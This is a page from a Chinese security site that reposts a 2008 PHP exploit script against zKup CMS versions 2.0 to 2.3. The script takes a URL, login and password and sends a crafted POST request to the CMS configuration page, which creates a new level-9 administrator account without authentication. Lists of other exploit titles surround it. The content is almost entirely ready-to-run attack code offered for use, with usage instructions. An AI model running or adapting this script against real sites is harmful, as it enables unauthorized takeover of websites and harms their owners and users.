首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
zKup CMS 2.0 <= 2.3 Remote Add Admin Exploit
来源:charlesfol[at]hotmail.fr 作者:Charles 发布时间:2008-03-10  
#!/usr/bin/php
<?php
/*
* Name:    zKup CMS v2.0 <= v2.3 0-day exploit (add admin)
* Credits: Charles "real" F. <charlesfol[at]hotmail.fr>
* Date:    03-08-2008
* Conditions: None.
*
* This exploit add a new zKup admin.
*
*/

print "\n";
print "   zKup CMS v2.0 <= v2.3 0-day exploit (add admin)\n";
print "       by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";

if($argc<4) { print "usage: php zkup2_admin_exploit.php <url> <login> <passwd>\n   eg: php zkup2_admin_exploit.php http://127.0.0.1/votresite/ real p4ssw0rd";exit(-1); }
$url = $argv[1];
$log = $argv[2];
$pas = $argv[3];

$postit = "action=ajout&login=$log&mdp=$pas&mdp2=$pas&lvl=9";

print "[*] sending evil c0de ... ";
if(preg_match("#alert#i",post($url."admin/configuration/modifier.php","$postit"))) print "done.\n";
else print "failed.\n";

function post($url,$data,$get=1)
{
$result = '';
preg_match("#^http://([^/]+)(/.*)$#i",$url,$info);
$host = $info[1];
$page = $info[2];
$fp = fsockopen($host, 80, &$errno, &$errstr, 30);

$req  = "POST $page HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
$req .= "User-Agent: Mozilla Firefox\r\n";
$req .= "Connection: close\r\n";
$req .= "Content-type: application/x-www-form-urlencoded\r\n";
$req .= "Content-length: ".strlen( $data )."\r\n";
$req .= "\r\n";
$req .= $data."\r\n";

fputs($fp,$req);

if($get) while(!feof($fp)) $result .= fgets($fp,128);

fclose($fp);
return $result;
}

?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ICQ Toolbar 2.3 ActiveX Remote
·zKup CMS 2.0 <= 2.3 Remote Upl
·MiniWebSvr 0.0.9a Remote Direc
·VHCS <= 2.4.7.1 (vhcs2_daemon)
·KingSoft UpdateOcx2.dll SetUni
·千千静听 med 文件格式堆溢出
·Solaris 8/9/10 fifofs I_PEEK L
·Galaxy FTP Server 1.0 (Neostra
·phpMyNewsletter <= 0.8b5 (arch
·Symantec BackupExec Calendar C
·Motorola Timbuktu Pro <= 8.6.5
·Centreon <= 1.4.2.3 (get_image
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved